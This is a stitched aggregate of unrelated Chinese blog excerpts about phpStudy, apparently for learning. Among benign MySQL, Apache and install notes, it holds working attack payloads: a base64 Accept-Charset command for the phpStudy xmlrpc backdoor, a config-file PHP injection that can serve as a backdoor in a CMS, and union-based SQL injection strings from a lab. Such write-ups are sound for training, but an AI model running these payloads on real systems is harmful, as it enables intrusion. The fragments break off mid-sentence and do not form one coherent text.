phpstudy

前段时间phpstudy被人发现某些版本存在后门，许多人就这样被当作肉鸡长达两年之久 后门隐藏在程序自带的 php 的 php_xmlrpc.dll 模块 影响的版本： phpstudy2016 和 2018 在 H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext 找到 php_xmlrpc.dll 用 notepad++ 打开， ctrl+f 搜索 eval 说明这个版本的 phpstudy 是由后门的 用 firefox 访问本地 ip ，用 bp 抓包，用 ctrl+r 送到 repeater 找到 accept-encoding ，把逗号后面的空格删掉， deflate 后面回车换行，加上 accept-charset ： c3lzdGVtKCdpcGNvbmZpZycpIDs= ，然后 go （这是 system(‘ipconfig’) ; 的 base64 加密） 漏洞复现成功 加 system(‘path’) ; （分号前面有空格） 安全问题不容小觑啊 来源： oschina 链接： https://my.oschina.net/u/4302374/blog/3383342

阅读目录 1、简介 2、环境说明 3、主从复制 3.1、MySQL 3.2、配置文件 3.3、开始构建主从复制 3.4、测试主从复制 4、MySql主主复制 4.1、实现原理 4.2、配置文件 4.3、开始构建主主复制 4.4、测试主主复制 5、注意事项 回到顶部 1、简介 MySQL作为世界上使用最为广泛的数据库之一，免费是其原因之一。但不可忽略的是它本身的功能的确很强大。随着技术的发展，在实际的生产环境中，由单台MySQL数据库服务器不能满足实际的需求。此时数据库集群就很好的解决了这个问题了。采用MySQL分布式集群，能够搭建一个高并发、负载均衡的集群服务器（这篇博客暂时不涉及）。在此之前我们必须要保证每台MySQL服务器里的数据同步。数据同步我们可以通过MySQL内部配置就可以轻松完成，主要有主从复制和主主复制。 回到顶部 2、环境说明 两台linux虚拟主机 Linux版本CentOS6.6、MySQL 5.5 ip：192.168.95.11、192.168.95.12 回到顶部 3、主从复制 回到顶部 3.1、MySQL 已经安装好，并且没有任何数据 回到顶部 3.2、配置文件 一般Linux中的MySQL配置文件都在/etc/my.cnf(windows中的配置文件为mysql.ini) log-bin=mysql-bin 开启二进制日志 注意：二进制日志必须开启

官网：http://www.dcrcms.com/ 简介：稻草人cms基于PHP+Sqlite/MySQL的开源简单小巧的免费企业网站系统 一、down下来源码，首先老规矩，审计工具走起。 发现只有56个漏洞，本着漏洞误报的心理，挑漏洞进行复现。 二、环境搭建 还是使用phpStudy进行一键式搭建。我这里是在虚拟机搭建的，本机做访问使用。 把网站的源码复制进根目录，启动 phpStudy。 一路安装 安装完成 三、漏洞复现 1、直接访问数据库文件型 二、 重安装漏洞型（Getshell） 由于安装文件一般是漏洞的重灾地，于是这里直接跳到了安装文件，果然找到了漏洞点。 在install_action.php中，安装完成后会把前端文件重命名，但是后端逻辑文件依旧存在，所以如果知道安装文件位置即可重安装 这里只重命名了前端文件 而且在文件280行，存在写文件操作，文件名为php且文件内容可控 由于文件内容可控，我们可以通过tablepre=exp来写入一个恶意php文件 tablepre=dcr_qy_';?><?php phpinfo()?> 由于写入的是配置文件，所以访问站点任意文件都会包含此文件，所以还可以当后门来用。 三、 任意文件删除漏洞（unlink函数） 全局搜索unlink函数的使用 姿势1、在fmanage_action.php中提供了文件删除功能

一、问题描述 5.6就提示这个错误，切换5.5就可以 二、原因分析 原因1：提示：“No input file specified.”原因在于使用的PHP5.6是fast_cgi模式，而在某些情况下，不能正确识别path_info所造成的错误 原因2 ：根节点的 这个文件全部注释掉 三、 问题解决： 1、先根据原因2处理掉即可，我是这个原因 2、如果解决不了，就用网上的方法 找到这个项目的所有 .htaccess 文件，一般在根节点或者public下 <IfModule mod_rewrite.c> Options +FollowSymlinks RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L] </IfModule> 　　 转：https://jingyan.baidu.com/article/f7ff0bfccce11c2e26bb1381.html 来源： oschina 链接： https://my.oschina.net/u/4290001/blog/3457605

练习二：Mysql+php 手工注入 注入点load_file读取配置文件 目标有3个（ 都要求手工）： 1 .手工注入找出admin用户的密码 2 .读取phpstudy中mysql的my.ini配置文件内容 3 .通过这个注入点写入webshell 　　　　目标1:手工注入找出admin用户的密码 网页(http://www.***.net/index.php)提示id查询，首先试试index.php?id=1，正常返回数据， 在后面加上and 1=1，and 1=2判断一下是否存在注入 这里降低了难度，不需要闭合语句（一般mysql都需要） order by判断有几个字段 ?id=1 order by n %23 可以试出n=5 联合查询 union select 1,2,3……,n判断显示字段有哪些 查当前数据库 +union select 1 ,database(), 2 , 3 , 4 , 5 % 23 可以看到当前数据库名为test 查所有数据库 union select schema_name, 2 , 3 , 4 , 5 from information_schema.schemata 接下来进入test数据库查询表名 union select 1 ,table_name, 3 , 4 , 5 from information_schema.tables

一、 HTML HTML ：超文本标记语言，可以加载 JS/CSS/ 图片 / 链接等非文字的内容 一切的网页开发技术都需要建立在 HTML 的基础之上 HTML 的结构和语法 HTML 元素 注释： <!-- 这里是注释内容 --> 图像： <img src="URL"> 连接： <a href="URL"> </a> 表单： <form><input></form> 内联框架： <iframe src="URL"></iframe> HTML DOM 树结构 为什么要将 HTML 文档转换为 DOM 树结构？ JavaScript （ JS ） 在 HTML 的 <script></script> 中运行 JS 如何获取一个 HTML 的元素内容？ 如何修改一个 HTML 的元素内容？ 如何创建动态的 HTML 元素内容？ 如何让页面增加点互动？ 以上使用 JS 访问和操作 HTML 就是 JS DOM 的操作 DOM 本质：连接 web 页面和编程语言 JS+DOM ：访问和操作 HTML 文档的标准方法 JS BOM ：获取浏览器信息，操作浏览器行为 如何让浏览器来警告用户？ 如何从浏览器获取用户 Cookie ？ Cookie ：通常是服务器发放给用户哭护短的一小段文本信息。 常见场景：用户输入用户名和密码成功登陆网站后网站会生成一个 cookie 给用户，当做用户凭证

简介： 消灭企业安全体系中“隐秘的角落” ———— APT攻击愈演愈烈，与SolarWinds相关的安全反思已持续半月，阿里云安全带来了面向供应链攻击特征属性的全面攻防观察，以飨从业者。 ———— 后期精彩的APT内网对抗往往依赖于「先从外部撕开」一道口子，对于黑客而言， 脆弱的供应链无异于一块「新大陆」，成为击穿「关键基础设施」的最佳切入点。 应用开发方式变革引入供应链风险 随着企业上云，传统的网络边界正在逐渐消失，尤其是突如其来的疫情，更是让几乎所有企业都不得不进行远程办公，员工开始从家庭网络、咖啡厅与企业网络建立连接， 企业的IT架构正在从「有边界」向「无限边界」发生转变。 受益于开源软件与成熟的三方产品和服务（COTS）的优势，国内互联网、金融行业快速发展。在COTS模式下，企业可以快速采购到能够满足当前业务需要的生产工具、软件或硬件产品，从而节省成本和时间。 开源软件的蓬勃发展改变了应用开发形态，现代应用的开发人员不再首选自研，而是会看当前业界是否已有成熟的框架或解决方案。 Synopsys公司发布的《2020年开源安全和风险分析OSSRA报告》中指出，当前超过90%的现代应用融入了开源组件，平均每个应用包含超过124个开源组件，其中49%的开源组件存在高危漏洞。 从政府服务到金融机构每个组织都依靠软件来为客户提供服务。嵌入式软件不再仅仅局限于计算机

做开发的过程中多少会用到MySQL数据库，所以忘记密码也就成为一些马虎的同学的家常便饭了，今天发布一个忘记MySQL密码如何修改的文章作为记录。 1.首先将MySQL的服务关闭，两种方法：1，打开命令行输入net stop mysql或者net stop mysql5命令即可关闭MySQL服务。2，由于本人电脑不知为何不能这样关闭所以只能采用第二种方法，在运行窗口中输入services.msc打开服务窗口，找到mysql然后关闭 2.打开MySQL安装路径，进入到bin目录中复制路径。 3、打开命令行，输入cd E:\phpStudy\PHPTutorial\MySQL\bin回车 4，输入mysqld --skip-grant-tables然后回车，此时这个命令行就不能输入东西了，类似于卡了的状态，这时先不用管这个命令行，再打开一个新的命令行 5.打开新的命令行，输入mysql回车 6.输入show databases; 可以看到所有数据库说明成功登陆。 7、其中mysql库就是保存用户名的地方。输入 use mysql; 选择mysql数据库。 8.其中mysql库就是保存用户名的地方。输入 use mysql; 选择mysql数据库。 9.show tables查看所有表，会发现有个user表，这里存放的就是用户名，密码，权限等等账户信息。 10.输入select user

linux下phpstudy安装 一、总结 一句话总结： 就是下载然后一步步用指令安装即可 二、linux下phpstudy安装 参考：linux下phpstudy安装 https://www.cnblogs.com/kuics/p/6127611.html 让我们来下载phpstudy for linux： 　　wget -c http://lamp.phpstudy.net/phpstudy.bin 再然后给予权限设置 　　chmod +x phpstudy.bin 执行安装 　　./phpstudy.bin 现在坐等它安装完成 　　　　 好了，现在开始做相关的配置 　　　　1.启动phpstudy服务 　　　　 　　　　2.站点配置 　　　　 　　　　3.安装phpstudy ftp 　　　　 　　　　 　　　　4.开通ftp 　　　　 　　　　5.可以使用ftp工具直接拖拽文件到网站空间了 来源： oschina 链接： https://my.oschina.net/u/4300922/blog/3520081

欢迎点击「算法与编程之美」↑关注我们！ 本文首发于微信公众号： "算法与编程之美"，欢迎关注，及时了解更多此系列文章。 Dvwa简介 DVWA（Damn Vulnerable Web Application）是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块，分别是： Brute Force（暴力（破解）） Command Injection（命令行注入） CSRF（跨站请求伪造） File Inclusion（文件包含） File Upload（文件上传） Insecure CAPTCHA （不安全的验证码） SQL Injection（SQL注入） SQL Injection（Blind）（SQL盲注） XSS（Reflected）（反射型跨站脚本） XSS（Stored）（存储型跨站脚本） DVWA 1.9的代码分为四种安全级别： Low，Medium，High，Impossible。 Dvwa网站搭建 第一步下载 phpstudy（https://www.xp.cn/wenda/401.html） 由于Dvwa是php网站，所以需要在php环境下运行。 安装完成后打开phpstudy并启动以下两项